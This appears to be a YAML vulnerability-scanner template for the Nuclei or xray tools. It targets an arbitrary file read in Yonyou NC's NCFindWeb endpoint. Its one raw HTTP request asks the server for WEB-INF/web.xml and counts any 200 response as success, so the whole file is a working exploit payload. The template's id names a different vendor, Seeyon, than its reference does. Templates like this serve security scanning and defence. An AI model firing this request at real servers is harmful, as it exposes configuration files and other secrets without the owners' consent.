id: poc-yaml-seeyon-wooyun-2015-148227

info:
  name: poc-yaml-seeyon-wooyun-2015-148227
  author: canc3s(https://github.com/canc3s)
  severity: high
  tags: xray-converted,ct-158094
  reference:
    - https://github.com/Cl0udG0d/edusrc_POC/blob/master/%E7%94%A8%E5%8F%8BERP-NC%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABPOC.py

http:
  - raw:
      - |
        GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200